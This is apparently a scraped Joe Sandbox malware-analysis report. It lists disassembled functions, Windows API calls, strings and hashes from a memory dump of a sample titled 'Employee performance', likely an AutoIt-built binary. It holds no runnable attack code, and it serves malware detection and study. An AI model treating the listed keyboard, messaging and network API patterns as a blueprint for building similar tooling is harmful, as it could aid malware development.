Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: c5f406a3f56e1af55ce3ac0e89f022617a788e225b013364e96d467846d05838
Instruction ID: 3b231c6da6320ea9afb113cf2ef356134a5dcf7375903c5d491b94028f099d67
Opcode Fuzzy Hash: c5f406a3f56e1af55ce3ac0e89f022617a788e225b013364e96d467846d05838
Instruction Fuzzy Hash: 33419F65D1021C65CB21EBB4CC8A9DFB7ACAF85710F408566E618E3122FB38E255C3E5

Function 00FEF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0102682C,00000004,00000000,00000000), ref: 00FEF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0102682C,00000004,00000000,00000000), ref: 0102F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0102682C,00000004,00000000,00000000), ref: 0102F454

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: bc346db4eb060e702fd9b603a39f7053719e90a9221be7a047a66e6c7124e483
Instruction ID: a5b28658de1d1bdc9629fa5511fafb76d3b4b3f74f271ef21e6fbded320916ec
Opcode Fuzzy Hash: bc346db4eb060e702fd9b603a39f7053719e90a9221be7a047a66e6c7124e483
Instruction Fuzzy Hash: D9415A31A086C0BAD7398B2FCD8872E7FA1AB46360F15802DE0C757562C67AA588E711

Function 01062D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 01062D1B
GetDC.USER32(00000000), ref: 01062D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 01062D2E
ReleaseDC.USER32(00000000,00000000), ref: 01062D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01062D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01062D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,01065A65,?,?,000000FF,00000000,?,000000FF,?), ref: 01062DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 01062DE1

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 58973c690e37be8eaba8b4d869e18e1f96a5d222a962799a103443942544d8e7
Instruction ID: 045e96b28ae87bbd34d8627fc2a8f10d220145d33d6dbcba0da19db67519903a
Opcode Fuzzy Hash: 58973c690e37be8eaba8b4d869e18e1f96a5d222a962799a103443942544d8e7
Instruction Fuzzy Hash: FA318B72201214BBFB218F548C8AFEB3FADEF09715F044055FE889A291C6BA9840C7A4

Function 01035622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 01035637
_memcmp.LIBVCRUNTIME ref: 01035659
_memcmp.LIBVCRUNTIME ref: 01035671
_memcmp.LIBVCRUNTIME ref: 01035684
_memcmp.LIBVCRUNTIME ref: 0103569E
_memcmp.LIBVCRUNTIME ref: 010356B1
_memcmp.LIBVCRUNTIME ref: 010356C9
_memcmp.LIBVCRUNTIME ref: 010356E4

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: a301a688d76f2037b4d60cdc687cc3421fae333726dfb61ff0c819696e7e5c6c
Instruction ID: fe6f2512886ca7cc0a4abe80bbe5e296e1759b29bd300b355bf0cddc5cf51c4a
Opcode Fuzzy Hash: a301a688d76f2037b4d60cdc687cc3421fae333726dfb61ff0c819696e7e5c6c
Instruction Fuzzy Hash: 1B21F9B174420AB7E2155926BE92FFE339DBFA4294F040014FE859F561F724ED10D1E5

Function 01054FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0105502E, 01055383
Not an Object type, xrefs: 01055007

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: f5958e372e23be4b7feed49a1bd949c920cd7b3a0cc999bd49b6bdb6cb28f283
Instruction ID: 8c2adcff9855073ed26317a6315ff6b900c54d909c4b88ce66d4d18e782113e0
Opcode Fuzzy Hash: f5958e372e23be4b7feed49a1bd949c920cd7b3a0cc999bd49b6bdb6cb28f283
Instruction Fuzzy Hash: 15D1A275A0020A9FDF90CF98CC80AAEBBF5BF48354F148469ED95AB281E771D945CB50

Function 01011522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,010117FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 010115CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,010117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 01011651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,010117FB,?,010117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 010116E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,010117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 010116FB

Part of subcall function 01003820: RtlAllocateHeap.NTDLL(00000000,?,010A1444,?,00FEFDF5,?,?,00FDA976,00000010,010A1440,00FD13FC,?,00FD13C6,?,00FD1129), ref: 01003852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,010117FB,00000000,00000000,?,00000000,?,?,?,?), ref: 01011777
__freea.LIBCMT ref: 010117A2
__freea.LIBCMT ref: 010117AE

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 7707fe4eeab04668799703d158c5c3ebae37751c5823b9ee323c4ab061d23d1a
Instruction ID: e7fdcba3b2615d9e30818f9b71ea2be4599d568b9f1cba52e1ba6a314bce97da
Opcode Fuzzy Hash: 7707fe4eeab04668799703d158c5c3ebae37751c5823b9ee323c4ab061d23d1a
Instruction Fuzzy Hash: 6A91CC71E042169FEB298E78C841AEE7BF5AF09710F1C4599EB81E7288D73DD940C7A0

Function 01054523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 01054648
VariantInit.OLEAUT32(?), ref: 01054749
VariantClear.OLEAUT32(?), ref: 01054753
VariantClear.OLEAUT32(?), ref: 010547B0

Strings

Incorrect Object type in FOR..IN loop, xrefs: 0105472C
Null Object assignment in FOR..IN loop, xrefs: 010545D8, 01054706, 010547BE

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: 0540677eba5140648d555c28590a80c06e455c87372007838f73bbe5ab50fc63
Instruction ID: 89c1fed37558b0c52e7f854895ce081f7e4af0a7c86d280fe371321246e3fa21
Opcode Fuzzy Hash: 0540677eba5140648d555c28590a80c06e455c87372007838f73bbe5ab50fc63
Instruction Fuzzy Hash: B7915D71A00219EBDF64CFA5C884FEFBBB8EF45714F008559E945EB281E7709985CBA0

Function 01041187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0104125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 01041284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 010412A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 010412D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0104135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 010413C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 01041430

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 3bf412820e07a1ffe3112f69108e494683325cd3ffa689dd4670deff46e331b9
Instruction ID: 69e08e32beeb3ac7854d5b409c17d5e9f1a90399f4e235503337a3ffd8522481
Opcode Fuzzy Hash: 3bf412820e07a1ffe3112f69108e494683325cd3ffa689dd4670deff46e331b9
Instruction Fuzzy Hash: BB91A1B5A00209AFEB11DF98C8C4BBE77B5FF45315F144079E680EB291DB79A981CB90

Function 00FE948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: b42b90b3e78f2d888db7c36582d0caf3c8039fef3b6af53c0054a15c334768e1
Instruction ID: 811b37544c199333d590c4ab2563f325d86e7c220103c41c736b336682199125
Opcode Fuzzy Hash: b42b90b3e78f2d888db7c36582d0caf3c8039fef3b6af53c0054a15c334768e1
Instruction Fuzzy Hash: 52916871D04219EFDB10CFAACC84AEEBBB8FF49320F148449E555B7251D3B8AA41DB60

Function 01053947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0105396B
CharUpperBuffW.USER32(?,?), ref: 01053A7A
_wcslen.LIBCMT ref: 01053A8A
VariantClear.OLEAUT32(?), ref: 01053C1F

Part of subcall function 01040CDF: VariantInit.OLEAUT32(00000000), ref: 01040D1F
Part of subcall function 01040CDF: VariantCopy.OLEAUT32(?,?), ref: 01040D28
Part of subcall function 01040CDF: VariantClear.OLEAUT32(?), ref: 01040D34

Strings

Incorrect Parameter format, xrefs: 010539A6, 01053BA1
AUTOIT.ERROR, xrefs: 01053A80, 01053A85

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 32746f60092c6a3515a0677a5619c18ef9b4c0cd4a46b0d300d32fd14a019c37
Instruction ID: c6795db04b5f77a381133ffc3403ce27d3a29ede6da26cf33a1d5dd1e5c231fd
Opcode Fuzzy Hash: 32746f60092c6a3515a0677a5619c18ef9b4c0cd4a46b0d300d32fd14a019c37
Instruction Fuzzy Hash: E5915775A083059FCB40DF28C88096ABBE5BF88354F04896EF9899B351DB35ED45CB92

Function 01054BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0103000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?,?,?,0103035E), ref: 0103002B
Part of subcall function 0103000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?,?), ref: 01030046
Part of subcall function 0103000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?,?), ref: 01030054
Part of subcall function 0103000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0102FF41,80070057,?), ref: 01030064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 01054C51
_wcslen.LIBCMT ref: 01054D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 01054DCF
CoTaskMemFree.OLE32(?), ref: 01054DDA

Strings

NULL Pointer assignment, xrefs: 01054E23, 01054E52

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: bde510c4b02b68f38242f0a54d021c507ed9eeded5cc2d98757ca16cd1043d9c
Instruction ID: 9800d67f19fda851104d9cb3db59c05eb471f059b2c1ae28cce22a8ba8247cb0
Opcode Fuzzy Hash: bde510c4b02b68f38242f0a54d021c507ed9eeded5cc2d98757ca16cd1043d9c
Instruction Fuzzy Hash: 77914771D0021DAFDF20DFA4DC90AEEBBB9BF48310F10816AE955A7251EB749A44DF60

Function 010620FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 01062183
GetMenuItemCount.USER32(00000000), ref: 010621B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 010621DD
_wcslen.LIBCMT ref: 01062213
GetMenuItemID.USER32(?,?), ref: 0106224D
GetSubMenu.USER32(?,?), ref: 0106225B

Part of subcall function 01033A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 01033A57
Part of subcall function 01033A3D: GetCurrentThreadId.KERNEL32 ref: 01033A5E
Part of subcall function 01033A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,010325B3), ref: 01033A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 010622E3

Part of subcall function 0103E97B: Sleep.KERNEL32 ref: 0103E9F3

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: c1f2f5261f01f7aee2498bdc66408c444a5a8358975619a1660d7b745533e2e9
Instruction ID: 1bacc85326933825c6ed706574697fdb211d4470e83537e660c48c8a70184506
Opcode Fuzzy Hash: c1f2f5261f01f7aee2498bdc66408c444a5a8358975619a1660d7b745533e2e9
Instruction Fuzzy Hash: 65717075E00206EFCB10DF68C845AAEBBF9EF88310F148499E996EB351D735E9418B90

Function 0103AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0103AEF9
GetKeyboardState.USER32(?), ref: 0103AF0E
SetKeyboardState.USER32(?), ref: 0103AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0103AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0103AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0103AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0103B020

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: cf5bf3758e9a5a4bcb43ce60a46702a6a8a81425b0c7367a4ee94df527f5348a
Instruction ID: dcdda6f7b8d5dd6210e18cc905720b2ff74d97c2e9c4dc556c3f0da4a5511b48
Opcode Fuzzy Hash: cf5bf3758e9a5a4bcb43ce60a46702a6a8a81425b0c7367a4ee94df527f5348a
Instruction Fuzzy Hash: 8951E3A06047D57DFB764238C845BBABEED5B86308F0885C9F2D9964D2C3D9A8C4D760

Function 0103ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0103AD19
GetKeyboardState.USER32(?), ref: 0103AD2E
SetKeyboardState.USER32(?), ref: 0103AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0103ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0103ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0103AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0103AE38

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 255f225906d6ab0f09de3dd24de045f067bedda0c890e9a3470957a80f589702
Instruction ID: 527a20a00bd03e8878412d67805cb697a3a877bf4b6827a311a0279fb4720fc8
Opcode Fuzzy Hash: 255f225906d6ab0f09de3dd24de045f067bedda0c890e9a3470957a80f589702
Instruction Fuzzy Hash: E451E7A17047D57EFB379238CC59BBA7EDC5B86304F0885C8E1D6874C2D294E884D760

Function 0100542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(01013CD6,?,?,?,?,?,?,?,?,01005BA3,?,?,01013CD6,?,?), ref: 01005470
__fassign.LIBCMT ref: 010054EB
__fassign.LIBCMT ref: 01005506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,01013CD6,00000005,00000000,00000000), ref: 0100552C
WriteFile.KERNEL32(?,01013CD6,00000000,01005BA3,00000000,?,?,?,?,?,?,?,?,?,01005BA3,?), ref: 0100554B
WriteFile.KERNEL32(?,?,00000001,01005BA3,00000000,?,?,?,?,?,?,?,?,?,01005BA3,?), ref: 01005584

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: b8b5f39179328974c68b370caee3b259fce603fb6ad279ee87e42dadb21aaa67
Instruction ID: fad42c17f26f2de9184f950cc57bf5853d17be7232e586263fee1967f89829d6
Opcode Fuzzy Hash: b8b5f39179328974c68b370caee3b259fce603fb6ad279ee87e42dadb21aaa67
Instruction Fuzzy Hash: 6451BF70A002499FEB22CFA8DC55AEEBBF9EF09301F14415AF995E7291D6319A41CF60

Function 00FF2D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00FF2D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00FF2D53
_ValidateLocalCookies.LIBCMT ref: 00FF2DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00FF2E0C
_ValidateLocalCookies.LIBCMT ref: 00FF2E61

Strings

csm, xrefs: 00FF2DF6

Memory Dump Source

Source File: 00000000.00000002.1261209851.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true

Associated: 00000000.00000002.1261144047.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.000000000106C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261288545.0000000001092000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261342223.000000000109C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1261362221.00000000010A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_fd0000_Employee performance.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: f7bd6224d96904da030aadefab687ddf5dcda9ae10034af94941dfcf4f3fcf99
Instruction ID: 569ab40d31e24c7b9c3318080b1d97128085cae5f8a2f9048d7c8a1095877188
Opcode Fuzzy Hash: f7bd6224d96904da030aadefab687ddf5dcda9ae10034af94941dfcf4f3fcf99
Instruction Fuzzy Hash: D041B335E0020DABCF10DF68CC95ABEBBB5BF45324F148155EA14AB362D7399A05DB90

Function 010510B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0105304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0105307A
